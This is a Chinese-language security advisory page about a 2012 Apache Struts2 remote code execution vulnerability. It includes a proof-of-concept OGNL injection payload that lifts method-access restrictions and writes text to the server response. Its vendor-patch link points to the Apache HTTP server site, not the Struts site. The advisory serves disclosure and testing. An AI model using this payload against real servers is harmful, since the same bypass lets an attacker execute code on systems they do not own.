发布日期:2012-08-23
更新日期:2012-08-28受影响系统:
Apache Group Struts2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55165Apache Struts是一款开发Java Web应用程序的开源Web应用框架。Apache Struts在实现上存在安全漏洞,攻击者可利用此漏洞在网络服务器进程中运行上传的脚本代码,导致非法访问或权限提升。<*来源:kxlzx
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!kxlzx ()提供了如下测试方法:%{(#_memberAccess["allowStaticMethodAccess"]=true)(#context["xwork.MethodAccessor.denyMethodExecution"]=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println("hacked by kxlzx"),#hackedbykxlzx.close())}建议:
--------------------------------------------------------------------------------
厂商补丁:Apache Group
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://httpd.apache.org/Samsung Kies MASetupCaller ActiveX控件不安全方法漏洞Microsoft Indexing Service "ixsso.dll" ActiveX控件拒绝服务漏洞相关资讯 Apache Struts 远程代码执行漏洞
- Microsoft Windows OLE远程代码执 (11/14/2014 12:13:56)
- HP System Management Homepage " (04/03/2013 13:59:17)
- Oracle Hyperion Financial (03/14/2013 15:00:59)
| - Apache Struts “ParameterInterce (05/23/2013 12:19:45)
- Novell ZENWorks AdminStudio (03/26/2013 18:45:20)
- Novell Groupwise Client ActiveX (02/02/2013 07:25:44)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|
易网时代-编程资源站